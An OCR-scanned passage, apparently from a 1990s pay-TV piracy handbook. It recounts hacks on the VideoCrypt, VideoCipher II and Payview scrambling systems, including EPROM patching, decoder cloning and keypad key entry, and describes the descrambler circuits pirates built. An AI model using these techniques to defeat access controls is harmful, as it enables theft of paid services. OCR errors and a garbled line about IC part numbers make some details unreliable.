pseudo line delay. Using the rise to above peak white as the lock point 
made that upgrade ineffective. 


The video inversion also caused problems. Many of the earlier descram- 
blers had field based sequence generators. They would have to be set with 
a DIP switch for the proper sequence. To counteract these descramblers, 
half sequences were used. As a result the sequence generators were 
knocked out. 


Some of the better descramblers used the inversion key technique of 
detecting the video inversion. This method, was also locked to the rising 
edge, but the descrambler had a system clock operating at a multiple of the 
line frequency which generated the sample slot. The sample was taken at 
the start of the active video. 
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Eventually, the only way to properly hack the system was to use a 
microcontroller based descrambler. Towards the end of Teleclub's use of 
Payview, microcontroller based decoders were the norm. This reduced the 
upgrade to a case of changing the descrambler's EPROM. 


Case Study: VideoCrypt 
Video Scrambling: Line Cut And Rotate 
Audio Scrambling: Spectrum Inversion - Not Used 
Users: Sky, The Adult Channel, JSTV 


The VideoCrypt system scrambles the video only. It cuts each line of video 
at one of 256 possible cut points. It then rotates the video information 
around this cut point. There are 625 lines in the PAL system. Only 585 lines 
or so are used for video, the rest are used for non-video information such as 
test signals and teletext. This means that only 585 lines have to be 
scrambled. 


The cut point on each line can be defined by one byte or eight bit word. The 
actual sequence of the cut points is pseudo random. The sequence is 
derived from a pseudo random number generator. This chip generates a 
sequence of numbers that will repeat if the sequence is left to run for long 
enough. The start point in the sequence is set by a seed transmitted over 
the air. This seed is changed every 2.5 seconds. 


Sky Channel's publicity people announced that Sky was to use the most 
pirate proof system yet devised. This claim was made by the publicity 
people and as such it is treated with due cynicism by those in the signal 
security business. It should be noted that every system that was considered 
totally secure has been hacked. What would inspire such confidence, lack 
of brainpower? 


The encryption methods used to protect the keys and the over the air 
addressing data are some of the most advanced yet. The Fiat Shamir Zero 
Knowledge Test is used to authenticate the smart card. Or rather it would be 
if it actually worked. A fault in the program of the smart card interface 
microcontroller in the early decoders meant that the most powerful aspect of 
the system could not be used. 


The descrambler is controlled by a smart card. The initial period for each 
card was to be three months. Due to the expense of distributing the cards, 
Sky tried to get as much time out of each card as they could typically 
stretching each card issue to two years. 
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ViaeoCrypt - Cut and Rotate Scrambling 


The VideoCrypt system uses Cut and Rotate as its method of video 
scrambling. In the diagram above the cut points are clearly visible. In 
reality, these cut points are hidden or masked using various 
techniques. The Thomson patents may actually hold the clues to the 
exact nature of the scrambling and the transition masking. 


Smart Card 






The VideoCrypt Decoder 
1: 8052 Interface Controller 

2: 6805 Data Demodulator 

3: Custom Logic PRNG 

4: Video Processing 





Baseband Input Video 


Output 
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The SMART card differs from the Automatic Teller Machine cards in that it 
has built in circuitry. The ATM card stores the data on a magnetic strip on its 
back. This built in circuitry in the smart card holds the keys for decrypting 
the seeds and other data transmitted over the air. 


The VideoCrypt system was developed by the French Thomson company. 
The system is one of the more modern scrambling systems that makes use 
of digital television technology. The primary weakness of most of the 
non-digital scrambling systems on the market is that they affect the synch 
pulses in the video. 


The critics of VideoCrypt have called it a halfway technology. In a sense it is. 
The D-MAC video scrambling system uses a double cut and rotate. It cuts 
and rotates the chrominance and the luminance separately. This would 
imply that the D-MAC video scrambling system is twice as secure as the 
VideoCrypt system. 


The technical media in Europe have carried articles examining the security 
of the VideoCrypt system. There were some articles about the system in 
some low level magazines that were little more than regurgitated publicity 
data. The few articles that appeared in the technical media were by the top 
European authorities on satellite signal security. (OK - | wrote the articles) 
They were of the conclusion that the VideoCrypt system could be hacked. 
(See Chapters 6 and 7) 


When | wrote the articles, more than a few of people disagreed with me. 
One journalist in particular wrote of VideoCrypt in such glowing terms that 
people began to think that he was employed by Sky. Of course he believed 
that VideoCrypt was invincible and it came as a nasty shock when it was 
hacked. 


The litany of hacks on this system is astounding. It is a good thing that they 
described it as having renewable security. The McCormac Hack, proposed 
in Version 2 worked. The write voltage limiting hack, as vaguely outlined on 
page 6-24 of Version 2, worked. The KENtucky Fried Chip hack worked. 
The Ho Lee Fook hack, the Phoenix Hack, the 09 Ho Lee Fook, the 10 
Battery Cards all worked. Not exactly the most pirate proof system yet 
devised was it? 
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Case Study: Videocipher II 


Video Scrambling: H and V Synch Replacement, video 
inversion 


The horizontal and vertical synch pulses are removed and replaced with 
digital data. The video is inverted and the color burst is moved to a 
non-standard voltage level. This is primarily to stop certain brands of 
television receivers locking the video using the color burst. 


Audio Scrambling: DES Encrypted Digital. 


The audio is transmitted in 14 bit packets. Quad level Pulse Amplitude 
Modulation is used to transmit the data. 


Users: Primarily used on C-Band. 


VideoCipher ІІ is perhaps the most important scrambling system in the 
history of signal security. It marked the first attempt to have a system 
accepted as the de facto system for video scrambling. It was a good 
scrambling system except someone left the critical data in the decoder 
totally exposed. It was based on the technology of the early eighties but it 
rapidly underwent upgrades and modifications to improve security. 


The VideoCipher ІІ system applied hard digital encryption techniques to the 
digitised audio. The encrypted digital audio was then inserted into the video 
line in place of the synch. The VideoCipher | system applied digital 
encryption to the video and the audio but was only used for studio and 
inter-company video hook-ups. It wasn't really financially viable for the mass 
market that VideoCipher ІІ was intended to serve. 


The digital encryption technique used for encrypting the data was the Data 
Encryption Standard algorithm. The algorithm is reversed by the American 
National Security Agency every day. There is no evidence to suggest that it 
was reversed to hack the VideoCipher system - there were easier ways of 
hacking VideoCipher II. 


The controlled access section of the VideoCipher system uses the DES 
algorithm to encrypt the keys and the programme attributes. The monthly 
key is encrypted with the unique key of each decoder. If a subscriber has 
not paid the fee, it is a simple matter to disable the decoder. The encrypted 
monthly key transmissions do not include a monthly key encrypted with the 
decoder's unique key. There are a number of unique keys in each decoder. 


The monthly key is decrypted by the decoder and used to decrypt the 
programme attributes. If the decoder is enabled for the programme, it would 
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The VideoCipher II System 


Bur = 


|J S25 NTSC 








[Inverted Line Video 
Colour Burst Moved To Non Standard Level 


88 Bits ОҒ ОРАМ Data 





Original Access Table Hacked Access Table 
Channel Address Decode Enable Channel Address Decode Enable 
Bytes Data Bytes Bytes Data Bytes 


Channel A Yes Channel A Yes 


Channel B [no | Channel B 


Channel C Channel C 











In the original table one channel is enabled. The hack involved 
over writing the data in each channel’s decode enable data. 
This had the effect of fooling the decoder into regarding 
each channel as having been paid for. 


This type of hack became known as the Musketeer Hack. 
One For All And All For One! 


2-78 


2: The Principles Of Security 


display the descrambled signal. The system as it stood had a number of 
flaws that almost proved fatal. These flaws led to the biggest piracy and 
counter-piracy battle yet seen. 


The authorisation data for each decoder is individually addressed. This is 
achieved by encrypting the packet with the descramblers unique key or 
address. This key was supposedly deeply embedded in the decoder, along 
with a number of alternates. 


The authorisation packet contained a 56 bit Tier Mask, a Service ID and a 
monthly key for the given service ID. The tier mask allowed access to one or 
more of the 56 possible packages available from that service. 


Each programme was transmitted with a similar 56 bit tier mask. This told 
the decoder what package it belonged to. If the programme tier mask 
matched that in the decoder then it could be descrambled. 


The Musketeer Hack 


The control routines were held in EPROM. The routines were disassembled 
and analysed. 


The first basic hack of the VideoCipher system merely involved an alteration 
of the routines in the EPROM. The hack gave the user access to all 
channels having only paid for one. The EPROMs with the altered routines 
became known as “Musketeer Chips” - one for all and all for one! The 
logic, ( no pun intended ), behind the hack was elegant. 


The decoder had a tier mask. This can be thought of as a number of 
registers that would hold a bit for each channel. If the decoder was enabled 
for a channel the register would high and the decryption circuitry would be 
allowed to decrypt the signal. If the bit was low then the decryption process 
would be inhibited. 


The weakness was that if you had the monthly key then nothing else was 
required. The program in U30, the EPROM was overwritten so that the tier 
mask was ignored. Since there was no tier mask check, all of the tiers were 
valid and the decoder was free to decode anything on that service. 


GI naturally were able to countermeasure this hack. Indeed their financial 
lives depended on it. By sending some instructions over the air, it was 
possible to get the secure processor to compare the program's tier mask 
with that of the decoder. If they did not match then the decoder halted. 


Preview Bit Hack 


Another hack was the use of the Preview Bit in the tier mask. Sometimes, 
channels would allow the decoder user to have a quick look at what he or 
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she was missing. The Preview Bit allowed the decoder to the descramble 
the signal for a few minutes. Often the audio was decrypted and a the 
screen was blacked out and a barker message was displayed. By using a 
simple video decoder to descramble the video and the VideoCipher II 
decoder to descramble the audio, it was possible to get a clear service. 
Unfortunately, once GI found out, this loophole was plugged. 


Clone Hack 


The simplest hack on the VideoCipher ІІ system was the clone hack. It 
extracted the decoder address and key set from a valid decoder and loaded 
them into other VideoCipher descramblers. As long as the original decoder 
or Clone Master remained authorised, all of the clones operated as well. 


When GI found a clone master, they were able to knock out hundreds of 
clones in one go. The one thing that they were looking for was a decoder 
that was subscribed to all services. This aroused their suspicions. Some of 
the clone hacks only wrote the key set to the battery backed up RAM. This 
left the original key set and address in the Secure Processor (TMS7000). 
One of GI's countermeasures was to check that the sets were the same. 


The Wizard Hack 


This was the most elegant hack on VideoCipher II. It allowed the direct entry 
of the monthly key from a key pad. The keys were available on bulletin 
boards, in hacker newsletters and on answering machines. Of course this 
type of key distribution is now illegal in the United States. The sources for 
the keys are outside the USA. 


Afterword 


The VideoCipher || system has lost its dominant position. One of the 
reasons for this is the migration to Ku Band systems such as DSS and 
Primestar. The dish size for Ku Band as vastly smaller than that required for 
C-Band. Of course there is an installed base of VideoCipher ІІ decoders. 
VideoCipher ІІ has been largely upgraded to VideoCipher Il Plus but even 
that too, apparently, has been hacked. 


VideoCipher Il or VideoCipher II Plus would not have stood a snowball's 
chance in Hell in the European environment. In Europe when a channel was 
evaluating potential scrambling systems, any system based on VideoCipher 
ІІ was considered a disaster waiting to happen. Indeed the only service to 
use VideoCipher technology was British Satellite Broadcasting. This com- 
pany was taken over by Sky and most of the management were fired. 
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The last few years have seen a change in the very nature of hacks. 
Whereas for the eighties, most systems were analogue with a sprinkling of 
digital, systems of the nineties have become more reliant on digital 
technology. As a result, most of the hacks depend on making the official 
decoders operate in a piractical manner. This generally means modifying 
code in the official smart card or developing a pirate smart card or indeed an 
emulator program. 


This subtle shift away from purely analogue techniques has not rendered 
the analogue techniques useless. There are still analogue systems in 
operation and with the way that things are going to fragment over the next 
few years, knowledge of how to crack analogue systems will be important. 


The evolution of the Blackbox industry over the last few years is almost a 
mirror of the near future case of digital television. Analogue and Digital 
systems exist side by side, as they will do so in the case of digital television. 
Indeed some people seem to consider that digital television will be a failure 
in the short term. 


Of course on satellite, things have changed dramatically as system after 
system collapsed. The analogue systems were easy targets and presented 
no real problems to hack. The next move on the part of the channels was to 
introduce an interim attempt at a digital service. Most notable among these 
was the FilmNet digital audio system add-on for the FilmNet SATPAC 
system. 


The next phase was the change to the D2-MAC EuroCrypt system. The 
technology and the ideas behind this standard were good for the time. It 
signaled a move away from the PAL standard to a more robust and 
potentially useful standard. However the people in the European Commis- 
sion bungled the implementation by an appalling ignorance of reality. 


This lack of understanding is typical. Most of these clueless individuals are 
classically educated. They are trying to draft legislation for a problem whose 
intricacies and subtleties are millennia beyond their mindset. They hire 
consultancies that are similarly clueless about piracy and then are left with 
an awful mess. 


With truly digital television systems expected to come into operation in the 
next few years it will be interesting to see if anything has been learned from 
the fiascos of the past. Then again it is difficult to have any confidence in the 
European Commission and their “advisors”. 
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In the Blackbox industry two tracks have appeared - a fast track and a slow 
track situation. Most of the satellite systems are on the fact track. Since the 
footprint of a transponder can cover a geographically large area, a hack on 
a system used on satellite has a wide application and can do a lot of 
damage. 


The slow track is represented by the low paying audience channels, the 
token scrambling systems and the cable systems. These channels and 
operators are not particularly worried by the security of the systems they 
used. Cable operators tend to think that their system is immune to any 
widespread piracy. Most of the older systems, the easily hackable ones are 
still employed on cable systems despite having being dropped on satellite 
channels long ago. 


There are few of the old analogue scrambling systems left in operation. 
With the increasing number of small cable systems springing up throughout 
Europe, older and less secure scrambling systems are being used as a 
cheap option. As a result of this most of the basic building blocks in this 
chapter have been left in for this version. A representative circuit for each 
system is also given. 


The circuits given in this chapter are those most commonly used by 
hackers. CMOS circuitry is almost invariably used as it is almost totally 
noise immune. This can be a good advantage to have when the receiver is 
microprocessor controlled as indeed are most ASTRA receivers. TTL 
circuitry is not generally used as it is too current hungry. There is a growing 
trend to use the low power fast TTL for crystal oscillator applications. 


Monostables 


Most of the simple analogue scrambling systems interfere with the synch 
section of the video signal. It is therefore essential for the hacker to 
regenerate the synch pulses. The most versatile circuit for this operation is 
the monostable multivibrator. The NE555 may sound like a good choice but 
it is not. It does not offer the designer or hacker the same facilities as the 
gated monostable multivibrator. 


The commonest circuit in hacking for timing purposes is the gated 
monostable multivibrator. Hackers mainly use three versions of this circuit; 
the 4098, the 4528 and the 4538. The 4538 is the precision version and is 
rarely used in low cost descramblers. Each IC contains two monostables. 
The timing constant for each monostable is set by an RC network. Each 
monostable can leading edge or trailing edge triggered. There are two 
outputs Q and NOT Q. The formulae for the timing constants are given with 
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4098,4528,4538 Monostable 


Cl 
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the circuit diagrams. Precision components such as silver mica or polysty- 
rene capacitors and metal film resistors are recommended. If precision 
resistors are not available then a carbon film-preset combination should be 
used. These circuits are the cornerstones of analogue hacker descram- 
blers. Ceramic capacitors should not be used for setting timing constants as 
they tend to drift causing severe synching problems. 


The more recent trend in analogue descrambler design has been to use a 
clock derived window rather than a monostable derived one. The clock 
oscillator is generally running at 2.0 MHz or above and some sequential and 
combinational logic is used to derive the window. However such designs are 
ok for production lines. Monostables are used for the initial experimentation 
as they can be adjusted to select the area of the line to be examined. When 
the development stage is complete, the design is generally converted to a 
clock based one as such designs are easier to mass produce. 


Comparators 


With many scrambling systems, it is necessary to detect a particular voltage 
level. This voltage level generally triggers some timing or processing 
circuitry. When the voltage level is part of the video signal, the video signal 
is normally amplified. The 311 comparator IC is then used to check the 
signal against a known reference level. The preset on the reference input, 
(see circuit), is always a multiturn cermet type. The comparator is also used 
as a Schmitt trigger to clean up pulses. In some cases two or more 
comparators will be required. In these cases the 339 quad comparator is 
used. This IC is cheaper than the twin comparator and so will probably be 
used if only two comparators are required. The pinouts for both ICs are 
given in the application diagram. 


In FilmNet descramblers, comparators were used to clean up the synchs or 
detect the polarity of the video using the horizontal synch. Other descram- 
blers such as those used on the Discret system use the comparator to 
detect the start of video in each line. This is accomplished by sampling the 
black level with a sample and hold circuit. The sampled level is then 
compared to the video signal. 


Synch Insertion And Restoration 


There are many methods of reinserting or restoring the synch pulses in 
video signals. The circuits covered here are the most widely used. In some 
cases such as the LuxCrypt system, it is necessary to completely recreate 
the synch pulses. 
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Two Amps - One Clamp: 


A simple two amps-one clamp circuit can be used to pull the synch down to 
its proper level. This type of circuit can only be used to restore the synch to 
its proper level, it cannot be used to reinsert a synch pulse. 


A refined form of the two amps-one clamp is used by the more advanced 
hacker. This circuit was first published in “Elektor Electronics”. 


The Multiplexer Approach: 


This circuit allows the black level and the synch tip level to be re-inserted. 
The voltage levels of the blanking and synch tip are set by presets. The 
multiplexer switches off the video and switches in the correct voltages to 
restore the synchs. 


The commonest IC for this purpose is the 4051 one into eight multiplexer. 
The normal and inverted video signals are connected to two inputs. The 
black level and synch tip levels are connected to two other inputs. Some 
external logic circuitry controls the addressing pins. 


The application circuit is shown with an NE592 video amplifier connected to 
give positive and inverted video into the multiplexer. 


This type of circuit is most useful in applications that requires either a 
polarity key or digital audio information to be separated from the scrambled 
waveform. The circuit can be implemented using the 4066 or 4016 CMOS 
switches instead of the multiplexer. 


Miscellaneous CMOS Circuits 


CMOS Integrator: 


CMOS circuitry can be used in analogue applications. A CMOS inverter can 
be made to function as an operational amplifier. In some applications, an 
integrator circuit is required. A typical circuit block using CMOS inverters as 
op-amps is given along with circuit values. This particular circuit has been 
used in the monostable Filmnet descrambler design to separate the frame 
pulse from the synch signal transmitted on the 7.56 MHz carrier. 


The addition of a 100K resistor across the second capacitor can improve 
the operation of the integrator. The values are not extremely critical. 
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Synch Insertion Circuits 
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CMOS Monostable Using NOR Gates: 


In order to protect a descrambler design from reverse engineering, a hacker 
most often resorts to unusual design techniques. The most obvious choice 
for a monostable is the 4528. With this circuit, NOR gates are used to 
function as a monostable. It can be used for general applications where 
precision timing is not necessary. 


Composite Synch Demodulators 


With external synch carriers, a separate demodulator is required. There are 
many circuits available for such a demodulator. The Filmnet SATPAC 
system was a good example of a synch carrier system. Most of the 
commercial pirate descramblers used a TBA120 for the demodulation of the 
carrier. Generally there is a tuned filter prior to the TBA120. This naturally 
adds to the setup costs. On some of the better quality pirate descramblers, 
the 7.56 MHZ carrier was upconverted to 10.7 MHz where it is passed 
through a standard 10.7 MHz ceramic filter. Tuning this type of demodulator 
is easier as it only means adjusting a tuning preset. 


A further simplification is the use of a crystal based oscillator to provide the 
mixing frequency. The frequency used is generally high side, (18.26 MHz). 
This approach was used in the Hi Tech Xtravision FilmNet descrambler. 


The cable version of the FilmNet system modulated the synch carrier on to 
the FM audio subcarrier. Most of the pirate designs worked by detecting this 
synch signal and using a PLL. Of course the difference here was that the 
processing would have been better handled at RF. Some television sets 
tended to clamp the video and as a result the descrambled picture from a 
modified satellite type decoder was not as good as the RF version. 


Polarity Detection 


Video inversion is where the video section of the line is inverted but the 
horizontal blanking section of the line remains at normal polarity. It is difficult 
though not impossible to hack. There are is a number of weaknesses that 
allow the hacker to ascertain the polarity. The reason the system designers 
considered video inversion so secure was that they had not considered the 
widespread use of microcontrollers in descramblers. The microcontrollers 
allow the hacker to generate accurate time slots for sampling the video 
signal. 


One possibility for defeating random video inversion is to digitise the a 
number of lines and compare the first few bytes at the start of each line. 
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CMOS Inverter Circuits 
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This may require a frame store to be properly effected. With some of the 
random line inversion systems, there is a signal transmitted in the line to tell 
the legitimate descrambler what type of scrambling to expect. This trigger 
signal is generally transmitted after the colour burst and before the video 
information. This reduces the security of the system and ensures that the 
system can be easily hacked. It should be remembered that most of the 
systems using video inversion were designed prior to 1985 and so reflect 
design ideas that are over ten years old. 


The vertical blanking interval is also used to transmit the sequence of the 
inverted line. Most of the companies using this technique seem to think that 
this method is secure against hackers. If the sequence is not encrypted they 
have or rather will have a critical problem on their hands. Normally one or 
more lines that would have been used for teletext are pre-empted for 
descrambler information. For a hacker, such a line would be easy to strip. A 
line snatcher circuit for oscilloscopes was published in “Elektor Electronics” 
magazine. The function of the circuit was to strip the vertical interval test 
signals for analysing the response of various television circuits and links. 
The circuit was presettable as to which line it snatched. It is extremely easy 
to convert this circuit to snatch the descrambler data. 


Many of the early Teleclub descramblers sampled the black levels of the pre 
video lines in each field to ascertain the inversion sequence in use. This 
method was neutralised by Teleclub. A false sequence was incorporated in 
the pre video lines. 


Sequence detection is one of the easiest hacks for the system owner to 
disable. Since the hacker descrambler is expecting a sequence of a preset 
duration, any variation in time of that sequence will upset the descrambler. 
A change of sequence will also defeat the descrambler. This method was 
used by Teleclub to defeat the switchable sequence descramblers. The 
sequence in these descramblers was set manually using a bank of DIL 
switches. By changing the inversion sequence inside a ten second period, it 
became impossible for the user to reset the sequence. 


Line Inversion: 


Line inversion is rarely used without synch suppression. The complete line 
is inverted. This is the easiest form of inversion to hack. The suppressed 
horizontal synch can be used as a key to determine the polarity. 


This inversion type is used on the FilmNet system. As such is the most 
widely analysed type. The countermeasures adopted by FilmNet have been 
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Polarity Detection - Inversion Types 
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actual inversion point occurs in the VBI rather 
than in the vertical blanking pulse. 
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rather clever but were never totally successful. They were all hacked inside 
an hour. 


NOKEY Suppressed Synch Methods 


A NOKEY system has no key that identifies the video as inverted or normal 
to the official descrambler. The inversion sequence is determined by an 
algorithm. The systems using this type of scrambling are generally 
addressable. 


Comparative Level Detection: 


The comparative level detection circuit compares a sample of the horizontal 
synch pulse tip with a sample of the horizontal blanking level. In a normal 
polarity signal the tip of the horizontal synch pulse should be lower than the 
blanking level. 


The circuit is only active during the horizontal blanking period. The output of 
the circuit is used to trigger a flip-flop or a monostable. The output of the 
monostable or flip-flop controls the video multiplexer. The sample points 
can be derived from monostables or from a system clock. Most of the 
present FilmNet descramblers use clock derived slots. 


This is one of the most widely used methods of polarity detection on the 
FilmNet system. It can be defeated by placing a pulse at the point in the 
horizontal synch pulse where the sample is taken. The descramblers that 
used clock derived sample points were most vulnerable to this upgrade. 
This is one of the countermeasures that was used on the FilmNet system 
though it was dropped because the descramblers were upgrade too easily. 


Synch Tip Detection: 


Synch tip detection is one of the easier types of level detection to 
implement. There is only one level to be detected. The detection occurs 
after the horizontal blanking section of the line has been pulled down to its 
normal level. If the polarity is correct then the level of the horizontal synch 
pulse tip should be at, or very close to, the clamp voltage. If the comparator 
detects a level greater than the clamp voltage then it will reset the flip-flop. 


This type of polarity detector was first used in the Oak ORION descrambler 
design in the Pink And Brown Book. In that application it was used to detect 
the polarity key. Hi Tech Xtravision implemented this type of detector design 
in their FilmNet descrambler. The design differed from the Pink And Brown 
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Book version in that it used CMOS rather than TTL. It is the most reliable 
method of polarity detection but it can be defeated. 


The FilmNet SATPAC upgrade of 05/11/90 was primarily intended to take 
out descramblers that were using this type of detector. The upgrade was a 
sine wave of near colour burst frequency. This had the effect of confusing 
the comparator. A later upgrade amplitude modulated the level of the sine 
wave using a very slow sine wave of approximately 1 Hz. This upgrade is 
similar to a facility in the IRDETO system. In that system, the digital audio 
level can be amplitude modulated by a 15 Hz sine wave. The circuit can be 
upgraded to cope with these countermeasures. It only requires the addition 
of two capacitors. 


Energy Concentration Detection: 


This is one of the more difficult methods to implement. It is also one of the 
more reliable. The energy level at the start of the video section of each line 
is sampled. If the level falls within the upper voltage window, the video is 
inverted. If the level falls within the lower window then the video is normal. 
The outputs of the comparators are fed to a logic circuit that controls the 
video multiplexer's monostable or flip-flop. 


This type of detection generally requires a system clock in the region of 4 
MHz. This is why many of the microcontroller based descramblers use it. It 
can be implemented by simpler circuitry. 


The colour burst generally remains in the same time slot in the scrambled 
video as it would in the normal video. The burst is used as the reference. 
This reference is used to lock a phase locked loop such as the 4046 to. 


A monostable derived or logic time derived slot is then used to trigger the 
sampling circuitry. The logic derived slot is the preferred method. A 
triggered monostable can be trickier to set up in production as a capacitor 
and preset combination would have to be used to get the timing precise. 
Component aging and heating would also affect the monostable compo- 
nents thus changing the slot over the lifetime of the decoder. Ideally the 
phase locked loop will be running at a multiple of the line frequency. For a 
500 nS slot, a clock frequency of at least 2 MHz would be required. 


KEYED Suppressed Synch Methods 


A keyed system has a key that instructs the official descrambler as to the 
polarity of the video. It is a very insecure method and apart from the 
LuxCrypt and the OAK ORION systems, it is not really used any more. 
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Key Detection: 


The circuits used for NOKEY polarity detection can be used for KEY polarity 
detection. The primary difference is in the timing of the sample slot. Most of 
the keys are after the colour burst and before the start of video. 


Polarity Detection - Clean Synch methods: 


Polarity detection is harder in clean synch systems. In a clean synch 
system, the synchs are not suppressed. If the designer knows what he is 
doing, he can make things very difficult for the hacker. 


Energy Concentration Detection: 


The same circuitry as used in the suppressed synch case can be used for 
this application. The timing reference can be the horizontal synch pulse or 
the colour burst. The burst is the more reliable of the two as the horizontal 
synch pulse can be dithered as in the PayView III system that was used by 
Teleclub. 


Line Video Delays And Pseudo Line Delays 


Video Delays: 


The delay of the video on a line by line basis is the basis of the Discret 
systems. There are a number of methods used to delay the video. The 
official Discret 1 descramblers used charged coupled device, (CCD), delay 
lines. The later PAL - SECAM Discret system used digital techniques to 
delay the video. 


The delays used in the system were 0 nS, 902 nS and 1804 nS. The 
hackers of the Discret system used a colour transient improver IC, the 
TDA4560 to create the two delays required to hack the system. 


The TDA4560 contained a gyrator delay line that produced a delay of 888 
nS. The TDA4565 has been superceded by the TDA4565. This IC is used in 
many of the descramblers used for the RAI service and on many small 
cablenets. 


The gyrator delay line in the TDA4565 can cope with signals up to 5.5 MHz 
without any serious degradation. The downside of the argument is that the 
IC has a through loss of 6 dB. This means that the video signal at the output 
has to be amplified by 6 dB. In the "Radio Plans" descrambler given in the 
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case study, this amplification was achieved by using a ТВА970. The МЕ592 
could also be used for this purpose but it would require black level clamping. 


Other attempts at fabricating delay lines were made. These ranged from 
custom glass delay lines that were manufactured by an Italian factory to a 
lumped inductor capacitor delay line. 


The digital approach to video delay was used by the official descramblers. 
They use a sampling frequency of four times the colour burst frequency, 
(17.735 MHz). This resulted in a cleaner picture definition on the descram- 
bled picture. 


Pseudo Line Delay: 


This technique has to be one of the cleverest methods of not delaying the 
video. The horizontal synch pulse is shortened and dithered in the horizontal 
blanking area. This creates the effect of line delay but the video starts in the 
normal position. It is only the position of the horizontal synch pulse that 
changes. 


Teleclub's old system, PayView III, had this facility. When used it had a 90% 
kill rate on the pirate descrambler market. The only descramblers that 
survived were those that re-inserted a new horizontal synch pulse. 


While most of the pirate descramblers that survived used the colour burst 
slot as the timing reference, there were some that took a more novel 
approach. The horizontal blanking in the PayView III system is raised above 
peak white. By using a comparator to detect the rising edge of the transition 
to the raised horizontal blanking, a retimed and recreated horizontal synch 
pulse could be inserted in the horizontal synch pulse. 


Autoswitching 


The term “autoswitching” means that the descrambler will detect а 
scrambled signal and descramble it automatically without the intervention of 
the user. The descrambler will route the descrambled video to the return 
video input on the receiver or to the direct video input of a television. The 
SCART or the D-Type connector are commonly used on the ASTRA type 
receivers. These connectors have all the outputs and inputs necessary to 
interface a descrambler with the receiver. On ASTRA receivers there will be 
a descrambler SCART or D-Type. The descrambler SCART differs from the 
standard SCART. (Chapter 9 examines this topic in more detail.) In the 
case of a SCART or D-Type connector the descrambler must supply a 
switching voltage to control pin to make the receiver accept the descram- 
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bled video signal rather than the receiver demodulator output. When the 
standard SCART is being used to supply a television with the descrambled 
video, the same switching voltage at pin 8 on the SCART must be present. 
The voltage should be 12 Volts for external video and audio source 
selection and 0 Volts for internal select. 


The detection of a scrambled signal is crucial to the autoswitching process. 
The official descramblers detect the addressing data in the scrambled 
signal. The Sky VideoCrypt descrambler will put up a channel identifier 
when it is fed with the scrambled Sky Movies signal. It also activates a 
switching pin on the descrambler scart to switch the decoder into the loop. 
Internal versions use a multiplexer to effect the switch over. Sometimes 
when this multiplexing IC blows there is no video on scrambled or clear 
channels. 


The actual type of autoswitching control is very much dependent on the 
descrambler’s operation. For a descrambler that uses a composite synch 
carrier technique, the circuitry is extremely simple. The FilmNet SATPAC 
system was a good example. 


When FilmNet was scrambled the composite synch carrier at 7.56 MHz 
carried the composite synch signal necessary to descramble the signal. 
When the signal was not scrambled, the composite synch signal was not 
transmitted on the 7.56 MHz. The autoswitching circuit would have to detect 
the absence or presence of the composite synch signal. The main 
consideration is that the circuit doesn't trigger on an audio signal. 


In most of the FilmNet descramblers, the field pulse was separated from the 
composite synch signal. This pulse train of field pulses is fed to an 
integrator. The inverter on the output of the integrator will only change state 
when the capacitor is sufficiently charged. The inverter output is high when 
there is no composite synch signal. The basic circuit given in the diagram 
could be adapted for most designs. 


There are other methods for implementing autoswitching. These generally 
involve detecting the absence of the horizontal synch or detecting the 
inverted synch. The overall circuits used in these operations can be 
complex. 


Detecting the absence of the horizontal synch is perhaps one of the simpler 
operations. The circuit used can be a straight comparator circuit as shown 
elsewhere in this chapter. The output of the comparator will be a clean 
synch train in the case of clear video. 


The alternate field inversion used by FilmNet made autoswitching easy to 
implement. Since the inversion was on a field basis, the switching waveform 
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for controlling the video polarity selection was a 25 Hz square wave. The 
high section of the square wave was used to select inverted video. This 
square wave was also used in the descrambler to identify the scrambled 
signal. In the case of a straight synch suppressed signal with no inversion, 
there was no square wave. The absence of the square wave indicated to 
the descrambler that video signal was clear rather than scrambled. 


Implementing autoswitching with LuxCrypt descramblers is also straightfor- 
ward. Since there would be no horizontal or vertical synch, this could act as 
a trigger. Since many of the descramblers designed for this system use 
PLLs, the second trigger would be a locked PLL. 


Phase Locked Loops 


The circuits given in the PLL diagrams are representative of some of the 
circuits used in descramblers. The 4046 is one of the most easily obtainable 
PLL ICs. It has been used extensively in non- commercial applications. 
Some of these designs were FilmNet and ORION decoders where the PLL 
ran at 15625 Hz to regenerate a line synch signal. 


The main use of phase locked loops in descramblers is in the process of 
synch regeneration. It is not the intention of this chapter to teach the 
rudiments of phase locked loops to the reader. One of the best explanations 
of the operation and design of PLLs can be found on pages 428 to 437 of 
The Art Of Electronics by Horowitz and Hill. 


In order to use a phase locked loop there must be some reference signal. 
This is generally a straightforward process if some reference signal such as 
the composite synch signal transmitted on FilmNet is present. Alternatively 
the suppressed horizontal synchs can be used. These would need to be 
sampled in order to be of use. 


In descramblers, the commonest form of phase locked loop is one that runs 
at a multiple of the input or reference frequency. In the FilmNet signal, a 
signal must be derived to pull down the horizontal synch section to its 
correct level. Using a PLL running at 15625 Hz does limit the designer to 
using monostables to generate pulses such as those required for polarity 
testing. A PLL that uses a low frequency input to generate a high frequency 
output is commonly known as a frequency multiplier type. The PLL based 
FilmNet descrambler shown later in this chapter is a good example of this 
type of PLL. 


In the PLL based FilmNet descrambler, the 2.0 MHz running frequency is 

divided down using combinational logic. The combinational logic provides a 

pulse of the correct duration for the synch pulldown. It also can be used to 

derive other signals such as a sample gate pulse or a polarity test pulse. 
3-26 


3: Descrambler Building Blocks 


The 4046 Phase Locked Loop 
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Case Study: PLL Based FilmNet Descrambler 


FilmNet has switched from SATPAC to D2-MAC EuroCrypt-M. The reason 
that this circuit is incorporated in version 5 is that it is a good example of 
what can be achieved with a purely analogue approach as opposed to using 
a microcontroller. There are also reports that FilmNet are using the 
SATPAC system on a link to Greece so this circuit may still have some 
application. 


This FilmNet descrambler uses a 2 MHz phase lock loop to provide the 
horizontal blanking. Autoswitching is included though no provision for 
polarity detection is made. The circuit uses commonly available parts. 


This circuit is for the main part the Hi Tech XtraVision FilmNet 
descrambler. It is reproduced here courtesy of Hi Tech. 


The Composite Sync Demodulator 


The FilmNet SATPAC system transmits a composite synch signal on a 
subcarrier at 7.56 MHz. The descrambling of the FilmNet signal involves the 
demodulation of this carrier and using it to reinsert the synch levels in the 
picture. 


The demodulator is based on the TBA120S quadrature demodulator IC. 
Two off the shelf 10.7 MHz transformers are used to make the set up 
simple. These transformers are made resonant at the correct frequency by 
the addition of capacitors in parallel with the internal capacitors. The use of 
NPO capacitors is essential in this application. 


With the values given, the output of the composite synch is approximately 
1VO peak. This composite synch signal is fed to a 311 comparator which 
produces a negative going synch output. This signal is fed to the main logic 
section. 


The Logic Section 


